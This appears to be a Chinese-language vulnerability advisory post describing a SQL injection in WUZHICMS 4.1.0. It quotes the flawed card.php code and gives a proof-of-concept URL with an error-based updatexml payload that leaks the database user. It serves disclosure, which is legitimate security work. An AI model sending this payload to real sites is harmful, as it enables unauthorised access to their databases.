wuzhicms v4.1.0 /coreframe/app/coupon/admin/card.php sql注入漏洞

WUZHICMS 4.1.0 中发现sql 注入漏洞。存在一个sql 注入漏洞,远程攻击者可以通过/index.php?m=coupon&f=card&v=detail_listing&groupname=a&_su=wuzhicms 向服务器注入恶意SQL 语句

漏洞文件:/coreframe/app/coupon/admin/card.php:39

public function detail_listing() {
        $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
        $page = max($page,1);
        $groupname = isset($GLOBALS['groupname']) ? strip_tags($GLOBALS['groupname']) : '';
        $where = $groupname ? "groupname='$groupname'" : '';
        $result = $this->db->get_list('coupon_card', $where, '*', 0, 20,$page,'cardid DESC');
        $pages = $this->db->pages;
        $total = $this->db->number;

        $status_arr = array('<font color="red">待发送</font>','未使用','已激活','<font color="green">已使用</font>');
        include $this->template('card_detail_listing');
    }

POC

/index.php?m=coupon&f=card&v=detail_listing&groupname=a' and updatexml(rand(),CONCAT(0x7e,USER()),1)='&_su=wuzhicms

图片[1]-wuzhicms v4.1.0 /coreframe/app/coupon/admin/card.php sql注入漏洞-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像的王0